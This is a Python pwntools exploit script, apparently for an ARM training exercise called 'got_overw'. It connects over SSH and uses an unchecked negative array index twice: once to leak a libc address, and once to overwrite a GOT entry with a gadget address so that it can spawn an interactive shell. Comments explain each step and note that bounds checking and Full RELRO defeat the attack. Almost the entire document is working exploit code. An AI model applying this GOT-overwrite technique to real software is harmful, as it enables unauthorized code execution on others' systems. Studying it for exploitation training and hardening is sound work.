#!/usr/bin/env python2
# Exploit script for the 'got_overw' target of the ARM "episode3" exercise.
# What the visible code does, step by step:
#   1. log in over SSH and launch the target binary,
#   2. fill its integer array so that the first two entries encode "/bin/sh",
#   3. read one entry through a negative (out-of-range) index to obtain a
#      libc pointer and derive the libc base,
#   4. write another entry through a negative index, which the inline
#      comments identify as a GOT slot.
# Defender's notes: both the leak and the write depend on an array index
# that is not bounds-checked, and the write depends on the GOT being
# writable at runtime. Bounds-checking the index removes both; building
# the binary with Full RELRO makes the GOT read-only after relocation, which
# blocks this class of GOT overwrite even if the index bug remains.
from pwn import *
# Connection parameters. NOTE(review): target address and credentials are
# hard-coded; "toSet" reads like a placeholder to be filled in before use.
ip = "192.168.0.13"
port = 22
user = "pi"
pwd = "toSet"
# Local copy of the target's libc. Symbol offsets below are resolved from
# this file, so it must match the build running on the target exactly or
# every computed address is off.
libc = ELF('libc-2.24.so')
# Offset, relative to the libc base, of the code address written into the
# GOT below. Hard-coded for this libc build; what the gadget does is not
# visible from this script.
gadget_offset = 0xed748
shell = ssh(user, ip, password=pwd, port=port)
sh = shell.run('/home/pi/arm/episode3/got_overw')
# Fill the array. The first two integers are the little-endian encodings of
# "/bin" (0x6E69622F) and "/sh\0" (0x0068732F); assuming 4-byte entries
# stored back to back, the array therefore begins with the NUL-terminated
# string "/bin/sh". The remaining ten entries are filler values 0..9.
sh.recvuntil('array:\n')
sh.sendline('1852400175') # 0x6E69622F = "/bin" (reads "nib/" as a big-endian string)
sh.sendline('6845231') # 0x0068732F = "/sh\0" (reads "hs/")
for i in range(0,10):
    sh.sendline(str(i))
sh.recvuntil('read: \n')
# Leak a libc address. Index -9 is outside the array; per the original
# comment it lands on the GOT entry for __libc_start_main. The leaked value
# is taken from the 7th whitespace-separated field of the response line.
sh.sendline('-9') # offset to the libc in the GOT section (negative index, outside the array)
ret = sh.recvline().split()
libc_main = int(ret[6])
# libc base = leaked __libc_start_main address - its offset inside libc
libc_base = libc_main - libc.symbols['__libc_start_main']
log.info('libcbase: %#x' % libc_base)
# Rebase system() on the leaked libc base.
system_addr = libc_base + libc.symbols['system']
log.info('system address: %#x' % system_addr)
sh.recvuntil('[y/n]\n')
# Decline reading any further entries.
sh.sendline('n')
sh.recvuntil('modify?\n')
# Answer the "modify?" prompt with the address of system. NOTE(review): the
# original comment only says the address is sent here; which slot or field
# of the target receives it is not visible from this script — confirm
# against the binary.
sh.sendline(str(system_addr))
sh.recvuntil('modify\n')
sh.sendline('-10') # offset of the put in the GOT section (negative index, outside the array)
sh.recvuntil('value\n')
# Value written into that slot: libc base plus the hard-coded gadget offset.
gadget_address = libc_base + gadget_offset
log.info('gadget address: %#x' % gadget_address)
# send the gadget address
sh.sendline(str(gadget_address))
# Hand the process I/O to the user, then tear down the SSH connection.
sh.interactive()
shell.close()